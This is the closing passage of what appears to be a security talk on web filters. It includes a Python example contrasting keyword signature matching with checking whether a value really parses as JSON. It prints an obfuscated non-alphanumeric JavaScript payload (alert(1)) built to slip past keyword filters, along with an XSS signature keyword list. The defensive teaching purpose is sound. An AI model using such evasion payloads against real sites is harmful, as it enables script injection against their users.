([],[][[![]+[]][+[]][++[[]][+[]]+[++[[]][+[]]][+[]]+[++[[]][+[]]][+[]]]+[[]+{}][+[]][+!![]]+[!![]+[]][+[]][+!![]]+[!![]+[]][+[]][+[]]])()[[![]+[]][+[]][++[[]][+[]]]+[![]+[]][+[]][++[[]][+[]]+[++[[]][+[]]][+[]]]+[![]+[]][+[]][++[[]][+[]]+[++[[]][+[]]][+[]]+[++[[]][+[]]][+[]]+[++[[]][+[]]][+[]]]+[!![]+[]][+[]][+!![]]+[!![]+[]][+[]][+[]]](+!![]) → Block of Javascript code
3. Be Agile
– Evolve with the threats
– And keep control of your defenses
In short: Get smart … or Die
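Added example, not the deck's code, for the "No AlphaNum JavaScript" slide and step 2 above: allowing "JSON structure characters" is not the same as allowing JSON. NONALNUM_JS is the payload printed on the earlier slide and JSON_RECORD the bookmarks record from this deck; the keyword list stands in for a classic signature filter, and the 0.5 density threshold is an assumption of this example.

```python
"""Identify what a value is instead of searching it for known bad strings.

Added example, not code from the deck. Standard library only.
"""
import json

# The non-alphanumeric alert(1) printed on the deck's "No AlphaNum JavaScript" slide.
NONALNUM_JS = ("([],[][[![]+[]][+[]][++[[]][+[]]+[++[[]][+[]]][+[]]+[++[[]][+[]]][+[]]]"
               "+[[]+{}][+[]][+!![]]+[!![]+[]][+[]][+!![]]+[!![]+[]][+[]][+[]]])()"
               "[[![]+[]][+[]][++[[]][+[]]]+[![]+[]][+[]][++[[]][+[]]+[++[[]][+[]]][+[]]]"
               "+[![]+[]][+[]][++[[]][+[]]+[++[[]][+[]]][+[]]+[++[[]][+[]]][+[]]+[++[[]][+[]]][+[]]]"
               "+[!![]+[]][+[]][+!![]]+[!![]+[]][+[]][+[]]](+!![])")
JSON_RECORD = '{"bookmarks":[{"Link":"www.example.com","Desc":"my favorite website"}]}'

# A keyword-style signature list in the spirit of the deck's Regexipus rules.
SIGNATURES = ("<script", "alert(", "javascript:", "onerror", "onload", "eval(")


def signature_filter_blocks(value):
    """The dinosaur: blocks only values containing a known keyword."""
    lowered = value.lower()
    return any(sig in lowered for sig in SIGNATURES)


def is_json_document(value):
    """A value admitted as JSON must actually parse as JSON."""
    try:
        json.loads(value)
    except ValueError:
        return False
    return True


def structural_density(value):
    """Share of characters that are neither alphanumeric nor whitespace."""
    if not value:
        return 0.0
    return sum(1 for c in value if not c.isalnum() and not c.isspace()) / len(value)


def nature_of_content(value):
    """'json' if it parses, 'code-like' if it is mostly punctuation without
    being a JSON document, otherwise 'text'. The 0.5 threshold is an assumption."""
    if is_json_document(value):
        return "json"
    if structural_density(value) > 0.5:
        return "code-like"
    return "text"


if __name__ == "__main__":
    for value in (NONALNUM_JS, JSON_RECORD, "my favorite website", "<script>alert(1)</script>"):
        print(f"{value[:40]!r:44} signature={signature_filter_blocks(value)!s:5} "
              f"density={structural_density(value):.2f} nature={nature_of_content(value)}")
```

The keyword filter passes the non-alphanumeric payload because there is nothing alphanumeric in it to match, while the nature check rejects it because a block of brackets that is not a JSON document has no legitimate reason to be in a JSON field; the bookmarks record passes because it parses.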
PART IV
ADVENT OF A NEW ERA
Humans
This small species evolved
It is intelligent
It is agile
It builds and controls powerful weapons
Most of the time…
BUT THAT’S ANOTHER STORY…
Questions
Answers